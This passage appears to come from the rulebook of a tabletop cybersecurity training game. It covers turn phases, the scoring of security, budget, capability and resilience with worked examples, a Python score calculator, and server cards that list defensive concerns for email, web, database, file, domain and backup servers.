│                      │
│ Satisfied by: Web    │
│ Server or cloud web  │
│                      │
│ Missed: -5 points    │
└──────────────────────┘

OPERATIONAL EVENT CARDS (print from cards/network-building/standalone/operational-event-cards.md)

16 cards (EVT-01 to EVT-16) of random incidents, opportunities, and challenges. Each states its effect and which designs mitigate it.

┌──────────────────────┐
│ OPERATIONAL EVENT    │
├──────────────────────┤
│ EVT-01: "Email       │
│ Server Failure"      │
│                      │
│ Pay 5 Budget to fix  │
│ OR -10 points        │
│                      │
│ Mitigated by:        │
│ redundant/cloud email│
└──────────────────────┘

Game Setup (5 minutes)

1. Explain Scoring System

Final Score = Security Score + Budget Score + Capability Score + Resilience Score − Requirement/Event penalties (+ bonuses)

Teams win by maximizing total score, not just saving budget.

2. Distribute Starting Materials

Each Team Receives:
  - Starting Budget: 50 Network Budget tokens (Standard difficulty)
  - Infrastructure Summary Sheet (to track what they've built)
  - Score Tracking Sheet
  - Network Diagram Worksheet (optional, for visualization)

3. Create Card Decks

Shuffle and place face-down:
  - Business Requirement deck (all 20 cards; 1 drawn per turn)
  - Operational Event deck (all 16 cards; 1 drawn per turn)

4. Brief Teams

"You're a CIO designing your organization's IT infrastructure for the next 18 months. You have limited budget ($50K, represented as 50 tokens). Each quarter brings new business requirements and operational challenges. You must balance:
  - Getting the work done (business requirements)
  - Keeping things secure (security devices)
  - Managing money (budget efficiency)
  - Surviving incidents (resilience features)

After 6 quarters (turns), we'll score your infrastructure. Highest score wins."


Turn Structure (4-5 minutes per turn)

Each Turn Has 4 Phases

Phase 1: Reveal Business Requirement (1 minute)

Threat Orchestrator flips top Business Requirement Card:

"It's Q2. The executive team wants to acquire a customer database company. You need to integrate their 2 million customer records into your infrastructure. You MUST have a functioning Database Server by end of Q2 or you lose 10 points (deal falls through)."

Team Notes:
  - What service is needed?
  - When is the deadline? (end of this turn unless the card says otherwise)
  - What's the penalty if you skip? (points deduction)

Teams Discuss: Do we have it? If not, how do we get it?

Phase 2: Reveal Operational Event (1 minute)

Threat Orchestrator flips top Operational Event Card:

"OPERATIONAL EVENT: Your Email Server just failed. It's been down for 2 hours. You can:
  - Option A: Pay 5 budget for emergency repair (get email back online)
  - Option B: Skip repair (email stays down all quarter) - lose 10 points (users upset, productivity down)
  - Option C: Use this as an excuse to upgrade (replace with new server, normal cost)"

Teams Decide: How to handle the incident?

Phase 3: Team Actions (2-3 minutes) (v2.2)

Teams may take ANY NUMBER of the following actions, in any order, limited only by budget (previously one action per turn):

Action A: Deploy a Server

Example: "We're deploying a Database Server on-premises. Cost: 10 budget. Remaining: 40 budget. This satisfies the Q2 acquisition requirement. No penalty!"

Action B: Deploy a Security Device

Example: "We're deploying an IDS on our internal network. Cost: 10 budget. Remaining: 30 budget. That gives us detection — if a ransomware or insider event comes up, we're covered."

Action C: Handle Operational Event

Example: "Email Server failed. We're paying 5 budget for emergency repair. That lets us avoid the -10 penalty. Remaining: 25 budget."

Action D: Pass

Phase 4: End of Turn Accounting (30 seconds)

Update Trackers:
  - Subtract budget spent
  - Mark servers/devices deployed
  - Apply any penalties from unmet requirements
  - Prepare for next turn

Next Turn Begins


Scoring System

Scoring Dimensions

Final Score = Security + Budget + Capability + Resilience − requirement/event penalties (+ bonuses)

Requirement and event penalties/bonuses (from the cards) are tracked as they happen and applied to the final total. Dimension scores can go negative.

1. SECURITY SCORE (0-30 points)

Measures defensive capability against attacks

Security Metric         Points  How Scored
IDS or IPS Deployed     +5      Detect/prevent network attacks
SIEM Deployed           +5      Centralized logging & detection
Firewall Deployed       +4      Perimeter / zone enforcement
Backup Server Deployed  +4      Ransomware recovery
Email Gateway Deployed  +3      Phishing protection
WAF Deployed            +3      Web application protection
Honeypot Deployed       +3      Early warning system
Network Segmentation    +3      Lateral movement prevention (Segmentation Switch or segmented architecture)

Maximum Security Score: 30 points (5+5+4+4+3+3+3+3 = 30)

Examples:
  - Only Email Gateway: 3 points (basic phishing defense, weak)
  - IDS + SIEM + Email Gateway: 13 points (good detection)
  - Full suite (IDS + SIEM + Firewall + Backup + Email Gateway + WAF + Honeypot + Segmentation): 30 points (enterprise-grade, but expensive)

2. BUDGET SCORE (0-20 points) (v2.2)

Rewards smart utilization: meeting the business's needs within budget while keeping a small contingency reserve. Hoarding budget is NOT rewarded — an unspent token did no work.

Budget Remaining at Game End → Points:

Budget Remaining  Points  Reading
5-15 left         20      Requirements met, plus a contingency reserve for surprises
1-4 left          15      Fully invested, but nothing left for the next incident
0 left            10      Ran completely dry
16-25 left        10      Under-invested; capability probably missing
26+ left          5       Hoarding — budget is not the goal

Anti-hoarding check: if the team missed 2 or more Business Requirements during the game, halve their Budget Score (round down). Saving money by failing the business is not efficiency.

Examples:
  - Spent 42, left 8: 20 points (met needs, kept a reserve)
  - Spent 46, left 4: 15 points (all-in; one bad event from trouble)
  - Spent 20, left 30: 5 points (a pile of tokens and a network full of gaps)

3. CAPABILITY SCORE (0-25 points)

Does infrastructure meet business needs?

Capability                   Points  Notes
Email Service                +3      Basic business function (Email Server or cloud-hosted)
Web Service                  +3      Public presence / e-commerce
Database Service             +4      High-value data management
File Storage                 +2      Internal collaboration
Domain Controller            +3      User identity & security
Development Capability       +2      Dev Server or dev via overload
Backup Server                +3      Disaster recovery
Remote Access (VPN Gateway)  +2      Work-from-home support
Cloud Workload               +2      Scalability & redundancy
Honeypot                     +1      Early-warning capability

Maximum Capability Score: 25 points (3+3+4+2+3+2+3+2+2+1 = 25)

Penalties for Missing Key Services:
  - No Email service: -5 (business can't communicate)
  - No Database service: -10 (core data has no home)
  - No Domain Controller: -3 (no central identity)
  - No VPN Gateway (only if a remote-work requirement card was drawn): -3

(Ransomware consequences for missing backups come from the event cards themselves — see EVT-11.)

Examples:
  - Email, Web, Database, File, Domain Controller, Backup: 3+3+4+2+3+3 = 18 points (good)
  - The same plus VPN Gateway and a Honeypot: 18+2+1 = 21 points (excellent)
  - Email, Web, File, Domain, Backup but NO Database: 3+3+2+3+3 = 14, minus 10 = 4 points (the penalty bites)

4. RESILIENCE SCORE (0-25 points)

Ability to survive and recover from failures

Resilience Factors:

Factor         Points  Criteria
Backup Server  +8      Can recover from ransomware/data loss
Detection      +7      IDS/IPS/SIEM can spot attacks early
Redundancy     +5      Duplicate server in the same role OR Load Balancer
Isolation      +3      Network segmentation prevents spread
Recovery Plan  +2      Has BOTH Backup Server and detection

Maximum Resilience Score: 25 points (8+7+5+3+2 = 25)

Penalties for Vulnerabilities (v2.2):
  - No Backup Server: -10 (one disaster from catastrophe)
  - Single point of failure (all critical services on one server): -5
  - No detection capability: -3
  - Flat network (no segmentation): -2

Examples:
  - Backup + Detection + Segmentation + Redundancy: 8+7+3+5, +2 recovery plan = 25 points (maximum; very resilient)
  - Backup + Detection, flat network, no redundancy: 8+7+2−2 = 15 points (adequate)
  - No backup, no detection, flat network: −10−3−2 = −15 points (high risk; yes, scores go negative)


Final Scoring Example

Team A's Infrastructure (resilience-first)

Built (total 46 of 50; 4 remaining):
  - Email Server (8): handles email
  - Web Server (7): public website
  - Database Server (10): customer data
  - File Server (6): internal files
  - Backup Server (9): disaster recovery
  - Email Gateway (6): phishing defense

Check: 8+7+10+6+9+6 = 46 ✓. No Domain Controller (too expensive; skipped for budget). Flat network.

Scoring Team A:

Security Score:
  - Email Gateway: +3
  - Backup Server: +4
  - No IDS/IPS/SIEM/Firewall/WAF/Honeypot/Segmentation: 0
  - Total: 7 points

Budget Score:
  - 4 budget remaining → 1-4 band
  - Total: 15 points

Capability Score:
  - Email +3, Web +3, Database +4, File +2, Backup +3 = 15
  - No Domain Controller: −3
  - Total: 12 points

Resilience Score:
  - Backup Server: +8
  - No detection: −3
  - Flat network: −2
  - Total: 3 points

Team A Final Score: 7 + 15 + 12 + 3 = 37 points


Team B's Infrastructure (security-first, no backup)

Built (total 47 of 50; 3 remaining):
  - Email Server (8)
  - Web Server (7)
  - Database Server (10)
  - Domain Controller (12)
  - IDS (10)

Check: 8+7+10+12+10 = 47 ✓. No Backup Server (sacrificed for detection). Flat network.

Scoring Team B:

Security Score:
  - IDS: +5
  - Total: 5 points

Budget Score:
  - 3 left → 1-4 band
  - Total: 15 points

Capability Score:
  - Email +3, Web +3, Database +4, Domain Controller +3 = 13
  - Total: 13 points

Resilience Score:
  - Detection: +7
  - No Backup Server: −10
  - Flat network: −2
  - Total: −5 points (negative!)

Team B Final Score: 5 + 15 + 13 − 5 = 28 points

RESULT: Team A (37) beats Team B (28)

Lesson: Having Backup is critical for resilience, even if it means fewer security devices.


Competitive Play (2-4 Teams)

Setup for Multiple Teams

Each team:
  - Separate budget (50 tokens each at Standard)
  - Separate infrastructure tracking sheet
  - Separate score tracker

Simultaneous Play:
  - All teams reveal the same requirement and event at the same time
  - Teams take turns choosing actions (round-robin) OR all teams act simultaneously
  - Simultaneous is faster; rotating turns allows player agency

Scoreboard

Track all teams' scores throughout game (illustrative):

Team    Sec  Budget  Cap  Res  TOTAL
Team A    8      20   12    5     45
Team B   12      15   18   10     55
Team C    5      10    8    2     25

Winner: Team with highest total score after the final turn

Tie-Breaking

If two teams tie:
  1. First tiebreaker: Security Score (defense is critical)
  2. Second tiebreaker: Resilience Score (ability to survive matters)
  3. Third tiebreaker: Capability Score (business requirement fulfillment)


Random Elements & Replayability

Requirement & Event Card Variability

Each game is different because:

  1. Card Order Randomized: Shuffle both decks each game — a 5-7 turn game uses only 5-7 of the 20 requirements and 16 events
  2. Card Selection: The Threat Orchestrator may curate the decks (see difficulty options on the card files)
  3. Consequence Ordering: Early disasters force different choices than late surprises

Example Game Flow Variations:

Game 1 (Tough Start):
  - Turn 1: Ransomware wave (REQ-12) → Must buy Backup + Detection early
  - Turn 2: Budget cut (EVT-05) → Can't afford nice devices
  - Turn 3: M&A integration (REQ-08) → Need more capacity
  - Result: Teams forced into defensive posture

Game 2 (Growth-Focused):
  - Turn 1: Product launch (REQ-01) → Need Web Server
  - Turn 2: Data acquisition (REQ-02) → Need Database
  - Turn 3: Emergency funds (EVT-06) → +10 budget!
  - Result: Teams build bigger, more capable infrastructure

Difficulty Levels (v2.2 — more budget = easier)

Beginner Mode (Generous):
  - Starting Budget: 60
  - Kind decks (remove EVT-11 and REQ-12 before shuffling)
  - Turn Limit: 7 (extra time)

Standard Mode:
  - Starting Budget: 50
  - Random card draws
  - Turn Limit: 6

Advanced Mode (Challenging):
  - Starting Budget: 40 (tight budget)
  - Harsh decks (remove EVT-06, EVT-07, EVT-16 — fewer breaks)
  - Requirement penalties doubled
  - Turn Limit: 5


Example Full Game Walkthrough (6 Turns, Standard 50)

TURN 1

Phase 1: Business Requirement TO flips card: "New Product Launch Website — need modern web server capability. If missing by end of Q1: -5 points."

Phase 2: Operational Event TO flips card: "Emergency Funds! A surprise rebate arrives. +10 Budget (one time)."

Budget update: 50 + 10 = 60

Phase 3: Team Actions "We're deploying a Web Server to meet the launch requirement. Cost: 7 budget. Remaining: 53. We know we'll need a backup server eventually — holding the rest for now."

Phase 4: End of Turn
  - Infrastructure: Web Server
  - Budget: 53


TURN 2

Phase 1: Business Requirement "Customer Data Acquisition — must have a functioning Database by end of Q2 or lose 10 points."

Phase 2: Operational Event "Email Server Failure — pay 5 budget for emergency repair OR skip and lose 10 points."

The team has no email server, so the TO rules the event inert — there's nothing to break. (TO tip: when an event targets a component the team doesn't own, it fizzles — but it's a great moment to point at the capability gap.)

Phase 3: Team Actions "We're deploying a Database Server (10 budget) to handle the acquisition — that's critical. The failure event doesn't apply to us, so no repair cost. Total this turn: 10. Remaining: 43."

Infrastructure: Web Server, Database Server
Budget: 43


TURN 3

Phase 1: Business Requirement "Ransomware Wave in Sector — you need Backup AND Detection capability OR lose 20 points."

Phase 2: Operational Event "Vendor Promotion — next security device this turn costs 2 less."

Phase 3: Team Actions "Critical quarter. We're deploying:
  - Backup Server (9 budget)
  - IDS at the promo discount (10 − 2 = 8 budget)
That satisfies the ransomware requirement. We'll also grab a Cloud Workload (4) for future flexibility. Total: 21 budget. Remaining: 22."

Infrastructure: Web, Database, Backup, IDS, Cloud Workload
Budget: 22


TURN 4

Phase 1: Business Requirement "Work-From-Home Program — need remote access capability. Missing: -3 points."

Phase 2: Operational Event "IT Staff Burnout — you may deploy at most ONE component this turn."

Phase 3: Team Actions "We need remote access, and burnout limits us to one deployment. VPN Gateway it is (9 budget). Remaining: 13."

Infrastructure: Web, Database, Backup, IDS, Cloud, VPN Gateway
Budget: 13


TURN 5

Phase 1: Business Requirement "Cyber-Insurance Renewal — Backup + Email Gateway + detection: +5 points if all present, -5 if not."

Phase 2: Operational Event "Hardware Recall — pick an on-prem server: pay 3 budget or it's offline this quarter."

Phase 3: Team Actions "We deploy an Email Gateway (6 budget) — with our Backup and IDS that completes the insurance checklist: +5 points. For the recall we pay 3 to keep the Database Server online (it's load-bearing). Total: 9. Remaining: 4."

Infrastructure: Web, Database, Backup, IDS, Cloud, VPN Gateway, Email Gateway
Budget: 4


TURN 6 (Final Turn)

Phase 1: Business Requirement "Single Sign-On Rollout — must have a Domain Controller OR lose 5 points."

Phase 2: Operational Event "Quiet Quarter — no incident."

Phase 3: Team Actions "A Domain Controller costs 12; we have 4. We can't buy it. We pass and take the -5 penalty."

Final Infrastructure & Budget Check:
  - Web Server (7)
  - Database Server (10)
  - Backup Server (9)
  - IDS (10, paid 8 with promo)
  - Cloud Workload (4)
  - VPN Gateway (9)
  - Email Gateway (6)
  - Recall fee (3)
  - Total spent: 7+10+9+8+4+9+6+3 = 56 of 60 available (50 start + 10 windfall)
  - Final Budget: 4 remaining ✓


FINAL SCORING (Walkthrough Team)

Security Score:
  - IDS: +5
  - Email Gateway: +3
  - Backup Server: +4
  - Total: 12 points

Budget Score:
  - 4 remaining → 1-4 band
  - Missed only 1 requirement (no halving)
  - Total: 15 points

Capability Score:
  - Web +3, Database +4, Backup +3, VPN +2, Cloud +2 = 14
  - No Email service: −5 (an Email Gateway is a security device — it filters mail, it doesn't host mailboxes; they never deployed an Email Server or cloud email)
  - No Domain Controller: −3
  - Total: 6 points

Resilience Score:
  - Backup Server: +8
  - Detection (IDS): +7
  - Recovery Plan (backup + detection): +2
  - Flat network: −2
  - Total: 15 points

Requirement/Event adjustments:
  - Turn 5 insurance bonus: +5
  - Turn 6 missed SSO requirement: −5

FINAL SCORE: 12 + 15 + 6 + 15 + 5 − 5 = 48 points

Lesson: This team survived the ransomware quarter and kept every event in check — but never bought email or identity. Detection and backups scored well; missing core business services bled capability points all game.
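The Scoring System above, the Team A / Team B comparison and the walkthrough total can all be checked with the following calculator. It is an added example, not part of the game's own materials; it uses the card names as written on this page, records on a Build the facts the Threat Orchestrator tracks on the summary sheet, and assumes (as noted in the code) that a Firewall alone does not count as segmentation.

```python
"""Score calculator for the Network Building Standalone scoring rules (v2.2).

Added example, not part of the game's own materials. Component names are the card
names from the rulebook; the Build flags are facts the TO records during play.
"""
from dataclasses import dataclass

DETECTION_DEVICES = {"IDS", "IPS", "SIEM", "Honeypot Network"}  # "counts as detection"
SECURITY_DEVICE_POINTS = {"SIEM": 5, "Firewall": 4, "Email Gateway": 3, "WAF": 3}
SERVICE_POINTS = {"Email": 3, "Web": 3, "Database": 4, "File Storage": 2, "Development": 2}
BUDGET_BANDS = ((5, 15, 20), (1, 4, 15), (0, 0, 10), (16, 25, 10))  # (low, high, points); 26+ -> 5


@dataclass
class Build:
    servers: list                 # server cards deployed (duplicates allowed)
    devices: list                 # security device cards deployed
    services: set                 # business services actually hosted (on-prem or cloud)
    budget_left: int
    missed_requirements: int = 0
    remote_work_card_drawn: bool = False
    segmented_architecture: bool = False   # TO ruled the design segmented
    single_point_of_failure: bool = False  # all critical services on one server
    card_adjustments: int = 0              # net requirement/event bonuses and penalties

    def has_backup(self) -> bool:
        return "Backup Server" in self.servers

    def has_detection(self) -> bool:
        return any(d in DETECTION_DEVICES for d in self.devices)

    def has_honeypot(self) -> bool:
        return "Honeypot Decoy" in self.servers or "Honeypot Network" in self.devices

    def is_segmented(self) -> bool:
        # Assumption: a Firewall alone is not segmentation (it only counts "toward" it).
        return "Network Segmentation Switch" in self.devices or self.segmented_architecture


def security_score(b: Build) -> int:
    pts = 5 if ("IDS" in b.devices or "IPS" in b.devices) else 0  # +5 once, not per device
    pts += sum(p for dev, p in SECURITY_DEVICE_POINTS.items() if dev in b.devices)
    pts += 4 if b.has_backup() else 0
    pts += 3 if b.has_honeypot() else 0
    pts += 3 if b.is_segmented() else 0
    return pts


def budget_score(b: Build) -> int:
    pts = next((p for lo, hi, p in BUDGET_BANDS if lo <= b.budget_left <= hi), 5)
    return pts // 2 if b.missed_requirements >= 2 else pts  # anti-hoarding check, round down


def capability_score(b: Build) -> int:
    pts = sum(p for svc, p in SERVICE_POINTS.items() if svc in b.services)
    pts += 3 if "Domain Controller" in b.servers else 0
    pts += 3 if b.has_backup() else 0
    pts += 2 if "VPN Gateway" in b.devices else 0
    pts += 2 if "Cloud Workload" in b.servers else 0
    pts += 1 if b.has_honeypot() else 0
    # Penalties for missing key services (VPN only bites if a remote-work card came up).
    pts -= 5 if "Email" not in b.services else 0
    pts -= 10 if "Database" not in b.services else 0
    pts -= 3 if "Domain Controller" not in b.servers else 0
    pts -= 3 if (b.remote_work_card_drawn and "VPN Gateway" not in b.devices) else 0
    return pts


def resilience_score(b: Build) -> int:
    redundant = "Load Balancer" in b.devices or len(b.servers) != len(set(b.servers))
    pts = 8 if b.has_backup() else -10
    pts += 7 if b.has_detection() else -3
    pts += 5 if redundant else 0
    pts += 3 if b.is_segmented() else -2           # isolation, or flat-network penalty
    pts += 2 if b.has_backup() and b.has_detection() else 0  # recovery plan
    pts -= 5 if b.single_point_of_failure else 0
    return pts


def score_build(b: Build) -> dict:
    s = {"security": security_score(b), "budget": budget_score(b),
         "capability": capability_score(b), "resilience": resilience_score(b)}
    s["final"] = sum(s.values()) + b.card_adjustments
    return s


# The rulebook's worked builds, transcribed here as constructed inputs.
TEAM_A = Build(servers=["Email Server", "Web Server", "Database Server", "File Server", "Backup Server"],
               devices=["Email Gateway"], services={"Email", "Web", "Database", "File Storage"},
               budget_left=4)
TEAM_B = Build(servers=["Email Server", "Web Server", "Database Server", "Domain Controller"],
               devices=["IDS"], services={"Email", "Web", "Database"}, budget_left=3)
WALKTHROUGH = Build(servers=["Web Server", "Database Server", "Backup Server", "Cloud Workload"],
                    devices=["IDS", "VPN Gateway", "Email Gateway"], services={"Web", "Database"},
                    budget_left=4, missed_requirements=1, remote_work_card_drawn=True,
                    card_adjustments=5 - 5)  # Turn 5 insurance bonus, Turn 6 missed SSO
```

Calling score_build on each constructed build reproduces the page's totals (37, 28 and 48) dimension by dimension, which makes it a quick way for a TO to audit a disputed score sheet.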


Variations & House Rules

Overload Servers (v2.2 — now a STANDARD rule, not a variation)

Servers may exceed capacity at +1 Budget per extra service. This is the same rule as the Network Building module.
  - Example: 3 services on a 2-capacity server costs +1 budget
  - Trade-off: cheaper than a new server now, but overloaded servers are recorded risks (single point of failure; events and later modules punish them)

Variation 1: "Upgrade Existing"

Optional Rule: Allow teams to upgrade servers already deployed (swap for a better one, pay the difference).
  - Example: Replace File Server (6) with Domain Controller (12) — pay 6, keep the hosted services
  - Creates flexibility but adds complexity

Variation 2: "Disaster Strikes Mid-Game"

Optional Rule (High Difficulty): If EVT-11 (Ransomware Strikes) is drawn and the team has NO Backup Server, they take the -20 immediately AND must deploy a Backup Server by the end of the next turn (mandatory).
  - Creates an urgent decision point
  - Teaches that failures have compounding consequences

Variation 3: "Tech Debt"

Optional Rule: Each Legacy System deployed costs 1 extra budget per turn to maintain (not paid upfront).
  - Teaches that cheap solutions have hidden costs
  - Creates long-term vs. short-term thinking


Debrief Questions (5-10 minutes)

Strategy Discussion

  1. "What was your infrastructure strategy? Why did you prioritize certain systems?"
  2. "Which trade-off was hardest? (Security vs. Capability vs. Budget)"
  3. "If you could replay, what would you change?"

Learning Connections

  1. "How does this relate to real IT budgeting?"
  2. "What did you learn about balancing security with other concerns?"
  3. "If this network gets attacked (Incident Response module), which vulnerabilities do you see?"

Competitive Reflection

  1. "Why did Team X score higher? What did they do differently?"
  2. "What was the winning strategy?"

Quick Reference Sheets

Scoring Summary (1 page)

NETWORK BUILDING STANDALONE SCORING (v2.2)

SECURITY SCORE (max 30):
  IDS or IPS: +5 | SIEM: +5 | Firewall: +4 | Backup: +4
  Email Gateway: +3 | WAF: +3 | Honeypot: +3 | Segmentation: +3

BUDGET SCORE (max 20) — smart utilization, not hoarding:
  5-15 left: 20 | 1-4 left: 15 | 0 left: 10 | 16-25 left: 10 | 26+ left: 5
  Missed 2+ requirements? Halve it (round down).

CAPABILITY SCORE (max 25):
  Email: +3 | Web: +3 | Database: +4 | File: +2 | Domain: +3
  Dev: +2 | Backup: +3 | VPN: +2 | Cloud: +2 | Honeypot: +1
  Penalties: no Email -5 | no Database -10 | no DC -3
             no VPN (if remote-work card drawn) -3

RESILIENCE SCORE (max 25):
  Backup: +8 | Detection: +7 | Redundancy: +5 | Segmentation: +3
  Recovery Plan (Backup AND Detection): +2
  Penalties: no Backup -10 | single point of failure -5
             no Detection -3 | flat network -2

FINAL = Security + Budget + Capability + Resilience
        − requirement/event penalties (+ bonuses)

Component Quick Reference

SERVERS (Cost / Capacity / Security Profile):
  Email (8/1/Low) | Web (7/1/Low) | Database (10/1/Med)
  File (6/2/Low) | Domain (12/2/Med) | Dev (5/3/Low)
  Backup (9/1/High) | Cloud (4/2/Med) | Legacy (3/1/VLow) | Honeypot (7/1/Med)
  Overload: +1 Budget per service beyond capacity

SECURITY DEVICES (Cost — benefit):
  Firewall (12 — zone control) | IDS (10 — detection) | IPS (14 — detection+blocking)
  Email Gateway (6 — anti-phishing) | WAF (11 — web app defense)
  SIEM (15 — detection+logging) | Segmentation Switch (10 — isolation)
  VPN Gateway (9 — remote access) | Load Balancer (8 — redundancy)
  Honeypot Network (8 — detection/deception)

Ready for Play!

This is a complete, standalone 30-45 minute competitive mini-game.

To run a session:
  1. Print server and device cards (cards/network-building/core-deck/)
  2. Print the requirement and event decks (cards/network-building/standalone/)
  3. Give each team a budget tracker
  4. Run 5-7 turns (4-5 min each, per difficulty)
  5. Calculate final scores
  6. Declare winner
  7. 10-minute debrief


v2.2 Playtest Edition Changes

Summary of changes for playtesters:

  1. Difficulty labels unified with the module: Beginner 60 / Standard 50 / Advanced 40 (was "Hard"). More budget = easier.
  2. Any-number actions (v2.2): Phase 3 now allows any number of deployments per turn, matching the module rules; the old "one action" wording contradicted the game's own walkthrough.
  3. Real card decks: Business Requirements (20 cards, REQ-01..REQ-20) and Operational Events (16 cards, EVT-01..EVT-16) now exist as printable files in cards/network-building/standalone/; inline example lists replaced by references to them.
  4. Budget Score redefined around smart utilization: the table now rewards finishing with a 5-15 token contingency reserve and no longer rewards hoarding (the old table gave 20 points for 40+ unspent, while the examples assumed the opposite). Anti-hoarding check added.
  5. Scoring tables recomputed: Security items now sum to the stated max 30; Capability items sum to 25 (Honeypot +1 added — it was in an example but missing from the table); Resilience factors sum to 25 and penalties were rebalanced (no Backup −10). All worked examples now add up.
  6. Worked examples rebuilt: Team A (37) and Team B (28) are clean, verified builds; the 6-turn walkthrough's budget ledger reconciles (56 spent of 60 available, 4 left, score 48). All AI drafting scratch-work removed.
  7. Overload is standard: +1 Budget per extra service beyond capacity — same rule as the module.
  8. Terminology: "VPN Gateway" (was VPN Concentrator), "Backup Server" (was Backup System); device "+1 stat" effects replaced with plain-language benefits tied to the scoring categories.
  9. Component costs verified against the module rules (the canonical source): servers 3-12, devices 6-15.

Incident Zero: Network Building Standalone Mini-Game Infrastructure design competition with multi-dimensional scoring v2.2 - Playtest Edition

cards/network-building/core-deck/server-cards.md

Network Building Module: Server Cards

Version: 2.2 - Playtest Edition
Last Updated: July 2026


Overview

Server Cards represent the core computational systems that run your business. Each server has cost (Budget), capacity (how many services it can host), complexity, and security properties that affect network design.


Server Cards

SRV-01: Email Server

Type: Business Critical | Cost: 8 Budget | Capacity: 1 service | Complexity: 2/4 | Availability Requirement: 99.9% (almost always needed)

Description: Central email system (Exchange, Postfix, or cloud-based like Office 365). Handles all organizational communication. Commonly targeted by phishing and credential attacks. Must support spam filtering, encryption, and audit logging.

Key Concerns:
  - Email spoofing and phishing vectors
  - Credential compromise (email = access to password resets)
  - Data exfiltration via email attachments and forwarding
  - High user impact if unavailable

Defense Considerations:
  - Requires Email Authentication (DMARC/SPF/DKIM)
  - Benefits from DLP for sensitive email attachments
  - Gateway filtering for phishing and malware
  - MFA required for administrative access

Network Placement: DMZ or protected segment (external access required)

Interactions:
  - Used with Asset Card "Email"
  - Referenced in Incident Response scenarios (T-01 Phishing, T-11 Browser Extension)
  - Part of Disaster Recovery "critical services" list


SRV-02: Web Server

Type: Business Critical | Cost: 7 Budget | Capacity: 1 service | Complexity: 2/4 | Availability Requirement: 99.5% (critical during business hours)

Description: Public-facing web application server (Apache, Nginx, IIS). Hosts corporate website, customer portal, or SaaS application. Primary attack surface for web exploits (SQL injection, XSS, remote code execution).

Key Concerns:
  - Web application vulnerabilities (OWASP Top 10)
  - Unpatched framework or library exploits
  - DDoS attacks targeting availability
  - Code injection and remote execution
  - Data exposure via web interface

Defense Considerations:
  - Requires WAF (Web Application Firewall) for SQL injection/XSS prevention
  - IPS for exploit signature detection
  - Regular patching and vulnerability scanning
  - Load balancer for availability
  - TLS/SSL for data in transit

Network Placement: DMZ (external access required, isolated from internal systems)

Interactions:
  - Used with Asset Card "Web"
  - Referenced in Incident Response scenarios (T-02 Watering Hole, T-05 Kernel Exploit)
  - Load balancer reduces single point of failure


SRV-03: Database Server

Type: Business Critical | Cost: 10 Budget | Capacity: 1 service | Complexity: 3/4 | Availability Requirement: 99.9% (critical for business operations)

Description: Relational or NoSQL database (SQL Server, PostgreSQL, MongoDB, Oracle). Stores customer data, financial records, operational data. Highest value target after compromise—contains the "crown jewels."

Key Concerns:
  - SQL injection attacks
  - Credential abuse (weak database admin passwords)
  - Lateral movement target (pivot point)
  - Unencrypted data at rest
  - Unencrypted data in transit
  - Unauthorized data access and exfiltration

Defense Considerations:
  - Requires Network Segmentation to limit access
  - Credential Guard and strong authentication
  - Database activity monitoring (DAM)
  - TLS for all connections
  - Data encryption at rest
  - Regular backups with immutability
  - Connection string in vault (not hardcoded)

Network Placement: Restricted segment (only authorized systems can connect)

Interactions:
  - Used with Asset Card "Database"
  - Referenced in Incident Response scenarios (T-04 Lateral Movement, T-10 SQL Exfiltration, T-11 Browser Extension)
  - Critical for Disaster Recovery backup and recovery


SRV-04: File Server

Type: Business Critical | Cost: 6 Budget | Capacity: 2 services | Complexity: 2/4 | Availability Requirement: 99% (needed during business hours)

Description: File storage and sharing system (SMB/CIFS, NFS, or cloud file sharing). Stores shared documents, project files, compliance records. Often contains both sensitive and non-sensitive data mixed together.

Key Concerns:
  - SMB lateral movement attacks
  - Excessive file permissions (everyone can read everything)
  - Ransomware encryption of shares
  - Unauthorized file access and data theft
  - Compliance violations (PII, PHI, PCI data stored unencrypted)
  - Uncontrolled data growth and backup challenges

Defense Considerations:
  - Network Segmentation to limit SMB access
  - File permissions auditing and hardening
  - DLP for sensitive file detection
  - Immutable snapshots for ransomware recovery
  - Encryption at rest
  - Access logging and monitoring

Network Placement: Protected segment (limited internal access only)

Interactions:
  - Used with Asset Card "File Storage"
  - Target of T-04 Lateral Movement in Incident Response
  - Critical dependency for Disaster Recovery


SRV-05: Domain Controller

Type: Business Critical | Cost: 12 Budget | Capacity: 2 services | Complexity: 3/4 | Availability Requirement: 99.5% (core infrastructure dependency)

Description: Active Directory or LDAP domain controller. Master repository of all user identities, credentials, and group memberships. Most powerful target in the organization—compromise of DC gives attacker control of entire directory.

Key Concerns:
  - Credential dumping (Mimikatz targets LSASS on DC)
  - Pass-the-hash attacks
  - Unauthorized privilege escalation
  - DC compromise = organization is fundamentally compromised
  - Backup DC synchronization complications
  - Can be both on-premises and cloud (Azure AD)

Defense Considerations:
  - Credential Guard to protect LSASS
  - Privileged Access Workstation (PAW) for DC admin access
  - Strong authentication (MFA) for all DC access
  - Network Segmentation (DC in restricted tier)
  - Backup DC in geographically separate location
  - Regular backup and recovery testing

Network Placement: Restricted segment (admin-only access)

Interactions:
  - Used with Asset Card "Identity"
  - Central to Incident Response investigation (T-06 Mimikatz, T-04 Lateral Movement)
  - DC compromise immediately loses the game (organizational control lost)
  - Critical for Disaster Recovery restore procedures


SRV-06: Development Server

Type: Business Important
Cost: 5 Budget
Capacity: 3 services
Complexity: 2/4
Availability Requirement: 80% (nice to have, can work around)

Description: Development and testing environment for software development. Lower security requirements than production but often contains production-like data (for testing). Developers need broad access for testing purposes.

Key Concerns:
  - Overly permissive developer access
  - Production data in dev (compliance violations)
  - Outdated/unpatched tools (focus on development, not security)
  - Lateral movement springboard to production
  - Code repository contains source code (intellectual property)
  - Test credentials and API keys hardcoded

Defense Considerations:
  - Separate dev database from production database (never use prod data)
  - Firewall rules to prevent dev→prod lateral movement
  - Code repository security (secrets scanning, access control)
  - Regular cleanup of test data
  - MFA for dev server access
  - Audit logging of developer activities

Network Placement: Development segment (isolated from production)

Interactions:
  - Used with Asset Card "Development"
  - Often overlooked security risk (compliance gap in Audit module)
  - Lateral movement target (attacker compromises dev to move to prod)


SRV-07: Backup Server

Type: Business Critical (Different Tier)
Cost: 9 Budget
Capacity: 1 service
Complexity: 2/4
Availability Requirement: 95% (needed for recovery scenarios)

Description: Backup and archival storage system (dedicated appliance, NAS, or cloud backup like Veeam, Commvault, or Backblaze). Stores point-in-time copies of all critical systems. The ultimate recovery mechanism for ransomware, disasters, and destructive attacks.

Key Concerns:
  - Backup corruption or compromise (renders backups useless)
  - Ransomware targeting backup systems
  - Backup media not separated from primary systems
